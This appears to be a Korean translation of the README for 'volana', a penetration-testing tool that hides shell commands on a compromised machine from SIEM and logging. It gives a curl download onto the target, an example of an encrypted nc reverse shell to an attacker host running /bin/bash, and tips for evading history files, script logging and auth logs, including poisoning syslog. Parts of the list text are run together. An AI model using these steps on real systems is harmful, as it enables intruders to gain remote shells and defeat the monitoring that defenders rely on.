
🌒 셸 명령어 난독화를 통한 탐지 시스템 회피
침투 테스트 중 중요한 측면은 은밀함(stealth)입니다. 따라서 작업 후 흔적을 지워야 합니다. 그러나 많은 인프라는 명령을 기록하고 실시간으로 SIEM에 전송하여 사후 정리만으로는 무용지물이 됩니다.volana는 자체 쉘 런타임을 제공하여 침해된 시스템에서 실행된 명령을 숨기는 간단한 방법을 제공합니다 (명령을 입력하면 volana가 실행합니다). 이렇게 하면 작업 중에 흔적을 지울 수 있습니다.
인터랙티브 쉘을 확보해야 합니다. (실행 방법을 찾으세요, 당신은 해커입니다, 그게 당신의 일입니다! 그렇지 않다면). 그런 다음 대상 머신에 다운로드하여 실행하세요. 그게 다입니다, 이제 은밀하게 실행하려는 명령을 입력할 수 있습니다.
## Download it from github release
## If you do not have internet access from compromised machine, find another way
curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana
## Execute it
./volana
## You are now under the radar
volana » echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1 #you are allowed to be a bit cocky
volana » [command]
volana 콘솔 키워드:
ring: 링 모드를 활성화합니다. 즉, 각 명령이 다른 많은 명령과 함께 실행되어 추적을 은폐합니다 (시스템 호출을 모니터링하는 솔루션으로부터)exit: volana 콘솔 종료비대화형 쉘(웹쉘 또는 블라인드 RCE)이 있다고 가정하면, encrypt 및 decrypt 하위 명령을 사용할 수 있습니다. 먼저, 내장 암호화 키로 volana를 빌드해야 합니다.
공격자 머신에서
## Build volana with encryption key
make build.volana-with-encryption
## Transfer it on TARGET (the unique detectable command)
## [...]
## Encrypt the command you want to stealthy execute
## (Here a nc bindshell to obtain a interactive shell)
volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
>>> ENCRYPTED COMMAND
암호화된 명령을 복사하여 RCE로 실행하세요 대상 머신에서
./volana decr [encrypted_command]
## Now you have a bindshell, spawn it to make it interactive and use volana usually to be stealth (./volana). + Don't forget to remove volana binary before leaving (cause decryption key can easily be retrieved from it)
왜 그냥 echo [command] | base64 로 명령을 숨기지 않나요?
그리고 대상에서 echo [encoded_command] | base64 -d | bash 로 디코딩하나요?
왜냐하면 우리는 base64 사용에 대해 경고를 발생시키거나 명령에서 base64 텍스트를 찾는 시스템으로부터 보호받고 싶기 때문입니다. 또한 조사를 어렵게 만들고 싶으며 base64는 실제 장애물이 아닙니다.
volana가 당신을 완전히 보이지 않게 만드는 기적은 아니라는 점을 명심하세요. 그 목표는 침입 탐지와 조사를 더 어렵게 만드는 것입니다.
탐지된다는 것은 특정 명령이 실행되었을 때 경고를 트리거할 수 있는 경우를 의미합니다.
.bash_history, ".zsh_history" 등opensnoop)script, screen -L, sexonthebash, ovh-ttyrec, 등)
pkill -9 scriptscreen은 회피하기가 조금 더 어렵지만, 입력은 기록하지 않습니다 (비밀 입력: stty -echo => 회피)volana로 회피할 수 있음/var/log/auth.log)
sudo 또는 su 명령에만 해당logger -p auth.info "No hacker is poisoning your syslog solution, don't worry")LD_PRELOAD 주입
클릭베이트 제목 죄송합니다만, 기여자에게는 돈이 지급되지 않습니다. 🐛
다음을 발견하셨다면 알려주세요:
volana를 탐지하는 방법volana 명령을 탐지하지 않는 콘솔 감시 방법